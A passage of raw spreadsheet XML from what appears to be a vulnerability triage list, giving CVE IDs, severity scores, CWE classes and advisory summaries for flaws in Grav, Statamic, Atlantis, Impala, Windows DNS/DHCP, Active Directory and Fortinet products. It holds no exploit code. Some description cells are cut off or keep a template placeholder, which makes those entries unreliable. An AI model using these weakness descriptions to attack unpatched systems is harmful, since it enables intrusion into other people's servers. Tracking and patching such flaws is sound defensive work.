          <t>Grav API Plugin is a RESTful API for Grav CMS that provides full headless access to your site's content. Prior to 1.0.6, the Grav API plugin ApiKeyManager::generateKey() stores a declared scopes array, but ApiKeyAuthenticator::authenticate() does not read keyData[scopes] and returns the owning user's complete identity. AbstractApiController::requirePermission() consequently evaluates the full user ACL, so a key issued for a read-only scope can perform every write, delete, and administrative operation available to the owner. This issue is fixed in version 1.0.6.</t>
        </is>
      </c>
      <c r="M1843" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62667</t>
        </is>
      </c>
    </row>
    <row r="1844">
      <c r="A1844" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1844" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-64665</t>
        </is>
      </c>
      <c r="C1844" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1844" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1844" s="5" t="inlineStr"/>
      <c r="F1844" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1844" s="5" t="inlineStr"/>
      <c r="H1844" s="5" t="inlineStr"/>
      <c r="I1844" s="5" t="inlineStr">
        <is>
          <t>2026-08-06</t>
        </is>
      </c>
      <c r="J1844" s="5" t="inlineStr"/>
      <c r="K1844" s="5" t="inlineStr">
        <is>
          <t>CWE-287, CWE-290</t>
        </is>
      </c>
      <c r="L1844" s="5" t="inlineStr">
        <is>
          <t>Statamic is a Laravel and Git powered content management system (CMS). Prior to 5.74.1 and 6.24.0, when OAuth login was enabled with a provider that does not guarantee verified email addresses, an unauthenticated attacker could sign in as an existing user, potentially including a super admin, without knowing that user's password, because the application matched OAuth identities to accounts by email address alone. Exploitation requires OAuth to be explicitly enabled with such a provider. This issue is fixed in versions 5.74.1 and 6.24.0.</t>
        </is>
      </c>
      <c r="M1844" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-64665</t>
        </is>
      </c>
    </row>
    <row r="1845">
      <c r="A1845" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1845" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-64679</t>
        </is>
      </c>
      <c r="C1845" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1845" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1845" s="5" t="inlineStr"/>
      <c r="F1845" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G1845" s="5" t="inlineStr"/>
      <c r="H1845" s="5" t="inlineStr"/>
      <c r="I1845" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="J1845" s="5" t="inlineStr"/>
      <c r="K1845" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-73</t>
        </is>
      </c>
      <c r="L1845" s="5" t="inlineStr">
        <is>
          <t>Atlantis is a self-hosted golang application that listens for Terraform pull request events via webhooks. From 0.19.8 until 0.45.0, Atlantis does not consistently validate user-controlled workspace values supplied through accepted repository-level atlantis.yaml configuration or authenticated /api/plan input before joining them into local workspace paths. Traversal segments can escape the intended per-pull workspace directory and cause clone preparation or other working-directory code paths to call os.RemoveAll, os.MkdirAll, or related filesystem operations on out-of-bounds directories before Terraform rejects the invalid workspace name. This can create, delete, or reuse writable paths with the privileges of the Atlantis process, causing integrity loss or denial of service. This issue is fixed in version 0.45.0.</t>
        </is>
      </c>
      <c r="M1845" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-64679</t>
        </is>
      </c>
    </row>
    <row r="1846">
      <c r="A1846" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1846" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-65181</t>
        </is>
      </c>
      <c r="C1846" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1846" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1846" s="5" t="inlineStr"/>
      <c r="F1846" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1846" s="5" t="inlineStr">
        <is>
          <t>java, apache</t>
        </is>
      </c>
      <c r="H1846" s="5" t="inlineStr">
        <is>
          <t>apache:impala</t>
        </is>
      </c>
      <c r="I1846" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1846" s="5" t="inlineStr"/>
      <c r="K1846" s="5" t="inlineStr">
        <is>
          <t>CWE-913</t>
        </is>
      </c>
      <c r="L1846" s="5" t="inlineStr">
        <is>
          <t>Insufficient authorization of Data Source tables in Impala 2.7-4.5 allows a client with privileges to upload a file to remote storage and create a table to execute arbitrary Java code.
Users are recommended to upgrade to version 4.5.2, which fixes this issue.</t>
        </is>
      </c>
      <c r="M1846" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-65181</t>
        </is>
      </c>
    </row>
    <row r="1847">
      <c r="A1847" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1847" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69325</t>
        </is>
      </c>
      <c r="C1847" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1847" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1847" s="5" t="inlineStr"/>
      <c r="F1847" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G1847" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H1847" s="5" t="inlineStr"/>
      <c r="I1847" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1847" s="5" t="inlineStr"/>
      <c r="K1847" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1847" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft JScript allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M1847" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69325</t>
        </is>
      </c>
    </row>
    <row r="1848">
      <c r="A1848" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1848" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69380</t>
        </is>
      </c>
      <c r="C1848" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1848" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1848" s="5" t="inlineStr"/>
      <c r="F1848" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1848" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H1848" s="5" t="inlineStr"/>
      <c r="I1848" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1848" s="5" t="inlineStr"/>
      <c r="K1848" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L1848" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in Microsoft Exchange Server allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M1848" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69380</t>
        </is>
      </c>
    </row>
    <row r="1849">
      <c r="A1849" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1849" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69438</t>
        </is>
      </c>
      <c r="C1849" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1849" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1849" s="5" t="inlineStr"/>
      <c r="F1849" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1849" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H1849" s="5" t="inlineStr"/>
      <c r="I1849" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1849" s="5" t="inlineStr"/>
      <c r="K1849" s="5" t="inlineStr">
        <is>
          <t>CWE-681</t>
        </is>
      </c>
      <c r="L1849" s="5" t="inlineStr">
        <is>
          <t>Incorrect conversion between numeric types in Microsoft JScript allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M1849" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69438</t>
        </is>
      </c>
    </row>
    <row r="1850">
      <c r="A1850" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1850" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69510</t>
        </is>
      </c>
      <c r="C1850" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1850" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1850" s="5" t="inlineStr"/>
      <c r="F1850" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1850" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H1850" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="I1850" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1850" s="5" t="inlineStr"/>
      <c r="K1850" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L1850" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows DHCP Server allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M1850" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69510</t>
        </is>
      </c>
    </row>
    <row r="1851">
      <c r="A1851" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1851" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69524</t>
        </is>
      </c>
      <c r="C1851" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1851" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1851" s="5" t="inlineStr"/>
      <c r="F1851" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1851" s="5" t="inlineStr">
        <is>
          <t>active directory</t>
        </is>
      </c>
      <c r="H1851" s="5" t="inlineStr"/>
      <c r="I1851" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1851" s="5" t="inlineStr"/>
      <c r="K1851" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1851" s="5" t="inlineStr">
        <is>
          <t>Use after free in Active Directory Domain Services allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M1851" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69524</t>
        </is>
      </c>
    </row>
    <row r="1852">
      <c r="A1852" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1852" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69530</t>
        </is>
      </c>
      <c r="C1852" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1852" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1852" s="5" t="inlineStr"/>
      <c r="F1852" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G1852" s="5" t="inlineStr"/>
      <c r="H1852" s="5" t="inlineStr"/>
      <c r="I1852" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1852" s="5" t="inlineStr"/>
      <c r="K1852" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1852" s="5" t="inlineStr">
        <is>
          <t>Use after free in Reliable Multicast Transport Driver (RMCAST) allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M1852" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69530</t>
        </is>
      </c>
    </row>
    <row r="1853">
      <c r="A1853" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1853" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69546</t>
        </is>
      </c>
      <c r="C1853" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1853" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1853" s="5" t="inlineStr"/>
      <c r="F1853" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1853" s="5" t="inlineStr">
        <is>
          <t>active directory</t>
        </is>
      </c>
      <c r="H1853" s="5" t="inlineStr"/>
      <c r="I1853" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1853" s="5" t="inlineStr"/>
      <c r="K1853" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1853" s="5" t="inlineStr">
        <is>
          <t>Use after free in Active Directory Domain Services allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M1853" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69546</t>
        </is>
      </c>
    </row>
    <row r="1854">
      <c r="A1854" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1854" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69620</t>
        </is>
      </c>
      <c r="C1854" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1854" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1854" s="5" t="inlineStr"/>
      <c r="F1854" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1854" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H1854" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="I1854" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1854" s="5" t="inlineStr"/>
      <c r="K1854" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L1854" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows DHCP Server allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M1854" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69620</t>
        </is>
      </c>
    </row>
    <row r="1855">
      <c r="A1855" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1855" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69680</t>
        </is>
      </c>
      <c r="C1855" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1855" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1855" s="5" t="inlineStr"/>
      <c r="F1855" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1855" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1855" s="5" t="inlineStr"/>
      <c r="I1855" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1855" s="5" t="inlineStr"/>
      <c r="K1855" s="5" t="inlineStr">
        <is>
          <t>CWE-346</t>
        </is>
      </c>
      <c r="L1855" s="5" t="inlineStr">
        <is>
          <t>Origin validation error in Windows DNS allows an unauthorized attacker to perform spoofing over a network.</t>
        </is>
      </c>
      <c r="M1855" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69680</t>
        </is>
      </c>
    </row>
    <row r="1856">
      <c r="A1856" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1856" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69732</t>
        </is>
      </c>
      <c r="C1856" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1856" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1856" s="5" t="inlineStr"/>
      <c r="F1856" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1856" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1856" s="5" t="inlineStr"/>
      <c r="I1856" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1856" s="5" t="inlineStr"/>
      <c r="K1856" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1856" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="M1856" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69732</t>
        </is>
      </c>
    </row>
    <row r="1857">
      <c r="A1857" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1857" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69782</t>
        </is>
      </c>
      <c r="C1857" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1857" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1857" s="5" t="inlineStr"/>
      <c r="F1857" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G1857" s="5" t="inlineStr"/>
      <c r="H1857" s="5" t="inlineStr"/>
      <c r="I1857" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1857" s="5" t="inlineStr"/>
      <c r="K1857" s="5" t="inlineStr">
        <is>
          <t>CWE-362, CWE-416</t>
        </is>
      </c>
      <c r="L1857" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in DNS Server allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M1857" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69782</t>
        </is>
      </c>
    </row>
    <row r="1858">
      <c r="A1858" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1858" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69786</t>
        </is>
      </c>
      <c r="C1858" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1858" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1858" s="5" t="inlineStr"/>
      <c r="F1858" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1858" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1858" s="5" t="inlineStr"/>
      <c r="I1858" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1858" s="5" t="inlineStr"/>
      <c r="K1858" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1858" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="M1858" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69786</t>
        </is>
      </c>
    </row>
    <row r="1859">
      <c r="A1859" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1859" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69813</t>
        </is>
      </c>
      <c r="C1859" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1859" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1859" s="5" t="inlineStr"/>
      <c r="F1859" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1859" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1859" s="5" t="inlineStr"/>
      <c r="I1859" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1859" s="5" t="inlineStr"/>
      <c r="K1859" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1859" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows DNS allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M1859" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69813</t>
        </is>
      </c>
    </row>
    <row r="1860">
      <c r="A1860" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1860" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69827</t>
        </is>
      </c>
      <c r="C1860" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1860" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1860" s="5" t="inlineStr"/>
      <c r="F1860" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1860" s="5" t="inlineStr"/>
      <c r="H1860" s="5" t="inlineStr"/>
      <c r="I1860" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1860" s="5" t="inlineStr"/>
      <c r="K1860" s="5" t="inlineStr">
        <is>
          <t>CWE-362, CWE-416</t>
        </is>
      </c>
      <c r="L1860" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in DNS Server allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M1860" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69827</t>
        </is>
      </c>
    </row>
    <row r="1861">
      <c r="A1861" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1861" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69858</t>
        </is>
      </c>
      <c r="C1861" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1861" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1861" s="5" t="inlineStr"/>
      <c r="F1861" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1861" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1861" s="5" t="inlineStr"/>
      <c r="I1861" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1861" s="5" t="inlineStr"/>
      <c r="K1861" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1861" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows DNS allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M1861" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69858</t>
        </is>
      </c>
    </row>
    <row r="1862">
      <c r="A1862" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1862" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69989</t>
        </is>
      </c>
      <c r="C1862" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1862" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1862" s="5" t="inlineStr"/>
      <c r="F1862" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1862" s="5" t="inlineStr"/>
      <c r="H1862" s="5" t="inlineStr"/>
      <c r="I1862" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1862" s="5" t="inlineStr"/>
      <c r="K1862" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1862" s="5" t="inlineStr">
        <is>
          <t>Use after free in DNS Server allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M1862" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69989</t>
        </is>
      </c>
    </row>
    <row r="1863">
      <c r="A1863" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1863" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70342</t>
        </is>
      </c>
      <c r="C1863" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1863" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1863" s="5" t="inlineStr"/>
      <c r="F1863" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G1863" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1863" s="5" t="inlineStr"/>
      <c r="I1863" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1863" s="5" t="inlineStr"/>
      <c r="K1863" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1863" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Ancillary Function Driver for WinSock allows an unauthorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M1863" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70342</t>
        </is>
      </c>
    </row>
    <row r="1864">
      <c r="A1864" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1864" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70465</t>
        </is>
      </c>
      <c r="C1864" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1864" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1864" s="5" t="inlineStr"/>
      <c r="F1864" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1864" s="5" t="inlineStr">
        <is>
          <t>windows, fortinet</t>
        </is>
      </c>
      <c r="H1864" s="5" t="inlineStr">
        <is>
          <t>fortinet:forticlient</t>
        </is>
      </c>
      <c r="I1864" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J1864" s="5" t="inlineStr"/>
      <c r="K1864" s="5" t="inlineStr">
        <is>
          <t>CWE-120</t>
        </is>
      </c>
      <c r="L1864" s="5" t="inlineStr">
        <is>
          <t>A buffer copy without checking size of input ('classic buffer overflow') vulnerability in Fortinet FortiClientWindows 7.4.0 through 7.4.3, FortiClientWindows 7.2.0 through 7.2.11 may allow an unauthenticated attacker in a position to alter or craft DNS responses to the targeted host to execute arbitrary code via malicious packets.</t>
        </is>
      </c>
      <c r="M1864" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70465</t>
        </is>
      </c>
    </row>
    <row r="1865">
      <c r="A1865" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1865" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70468</t>
        </is>
      </c>
      <c r="C1865" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1865" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1865" s="5" t="inlineStr"/>
      <c r="F1865" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1865" s="5" t="inlineStr">
        <is>
          <t>fortinet</t>
        </is>
      </c>
      <c r="H1865" s="5" t="inlineStr">
        <is>
          <t>fortinet:fortimanager, fortinet:fortimanager_cloud</t>
        </is>
      </c>
      <c r="I1865" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J1865" s="5" t="inlineStr"/>
      <c r="K1865" s="5" t="inlineStr">
        <is>
          <t>CWE-288</t>
        </is>
      </c>
      <c r="L1865" s="5" t="inlineStr">
        <is>
          <t>A authentication bypass using an alternate path or channel vulnerability in Fortinet FortiManager 7.6.1, FortiManager 7.4.3 through 7.4.5, FortiManager 7.2.5 through 7.2.9, FortiManager Cloud 7.6.1, FortiManager Cloud 7.4.3 through 7.4.5, FortiManager Cloud 7.2.5 through 7.2.9 may allow attacker to improper access control via &lt;insert attack vector here&gt;</t>
        </is>
      </c>
      <c r="M1865" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70468</t>
        </is>
      </c>
    </row>
    <row r="1866">
      <c r="A1866" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1866" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70482</t>
        </is>
      </c>
      <c r="C1866" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1866" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1866" s="5" t="inlineStr"/>
      <c r="F1866" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1866" s="5" t="inlineStr"/>
      <c r="H1866" s="5" t="inlineStr"/>
      <c r="I1866" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J1866" s="5" t="inlineStr"/>
